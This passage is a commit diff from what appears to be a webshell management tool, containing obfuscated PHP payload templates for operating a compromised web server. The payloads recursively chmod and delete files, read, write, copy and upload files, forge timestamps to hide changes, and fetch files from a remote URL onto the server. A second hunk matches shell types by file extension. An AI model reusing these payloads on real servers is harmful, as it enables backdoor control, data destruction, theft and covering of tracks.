_: `function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}`,
},
create_file: {
_: `echo @fwrite(fopen(base64_decode(substr("#{newbase64::path}",#randomPrefix#)),"w"),base64_decode(substr("#{newbase64::content}",#randomPrefix#)))?"1":"0";`,
},
read_file: {
_: `$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$P=@fopen($F,"r");echo(@fread($P,filesize($F)?filesize($F):4096));@fclose($P);`,
},
copy: {
_: `$m=get_magic_quotes_gpc();$fc=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$fp=base64_decode(substr("#{newbase64::target}",#randomPrefix#));function xcopy($src,$dest){if(is_file($src)){if(!copy($src,$dest))return false;else return true;}$m=@dir($src);if(!is_dir($dest))if(!@mkdir($dest))return false;while($f=$m->read()){$isrc=$src.chr(47).$f;$idest=$dest.chr(47).$f;if((is_dir($isrc))&&($f!=chr(46))&&($f!=chr(46).chr(46))){if(!xcopy($isrc,$idest))return false;}else if(is_file($isrc)){if(!copy($isrc,$idest))return false;}}return true;}echo(xcopy($fc,$fp)?"1":"0");`,
},
download_file: {
_: `$F=base64_decode(substr("#{newbase64::path}",#randomPrefix#));$fp=@fopen($F,"r");if(@fgetc($fp)){@fclose($fp);@readfile($F);}else{echo("ERROR:// Can Not Read");}`,
},
upload_file: {
_: `$f=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
$c="#{buffer::content}";
$c=str_replace("\\r","",$c);
$c=str_replace("\\n","",$c);
$buf="";
for($i=0;$i<strlen($c);$i+=2)
$buf.=urldecode("%".substr($c,$i,2));
echo(@fwrite(fopen($f,"a"),$buf)?"1":"0");`.replace(/\n\s+/g, ''),
},
rename: {
_: `
$src=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
$dst=base64_decode(substr("#{newbase64::name}",#randomPrefix#));
echo(rename($src,$dst)?"1":"0");`.replace(/\n\s+/g, ''),
},
retime: {
_: `
$FN=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
$TM=strtotime(base64_decode(substr("#{newbase64::time}", #randomPrefix#)));
if(file_exists($FN)){
echo(@touch($FN,$TM,$TM)?"1":"0");
}else{
echo("0");
};`.replace(/\n\s+/g, ''),
},
chmod: {
_: `
$FN=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
$mode=base64_decode(substr("#{newbase64::mode}",#randomPrefix#));
echo(chmod($FN,octdec($mode))?"1":"0");`.replace(/\n\s+/g, ''),
},
mkdir: {
_: `$f=base64_decode(substr("#{newbase64::path}",#randomPrefix#));echo(mkdir($f)?"1":"0");`,
},
wget: {
_: `$fR=base64_decode(substr("#{newbase64::url}",#randomPrefix#));
$fL=base64_decode(substr("#{newbase64::path}",#randomPrefix#));
$F=@fopen($fR,chr(114));
$L=@fopen($fL,chr(119));
if($F && $L){
while(!feof($F))
@fwrite($L,@fgetc($F));
@fclose($F);
@fclose($L);
echo("1");
}else{
echo("0");
};`.replace(/\n\s+/g, ''),
}
})
\ No newline at end of file
source/modules/shellmanager/list/form.js
View file @ 38ac1b04
......@@ -268,22 +268,19 @@ class Form {
"aspx": /.+\.as(px|mx)/,
"asp": /.+\.(as(p|a|hx)|c(dx|er))/,
"jsp": /.+\.(jsp[x]?)/,
"jsp": /.+\.(jsp[x]?)/,
"custom": /.+\.((jsp[x]?)|cgi)/
}
let typecombo = form.getCombo('type');
if (file_match.php.test(id) == true) {
typecombo.selectOption(typecombo.getOption('php').index);
} else if (file_match.aspx.test(id) == true) {
typecombo.selectOption(typecombo.getOption('aspx').index);
} else if (file_match.asp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('asp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jsp').index);
} else if (file_match.jsp.test(id) == true) {
typecombo.selectOption(typecombo.getOption('jspjs').index);
} else if (file_match.custom.test(id) == true) {
typecombo.selectOption(typecombo.getOption('custom').index);
let lasttype = typecombo.getSelected();
for (const key in file_match) {
if(file_match[key].test(id) == true) {
// phpraw jspjs 时不改变类型
if(lasttype.indexOf(key)>-1){
break;
}
typecombo.selectOption(typecombo.getOption(key).index);
break;
}
}
}
......
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment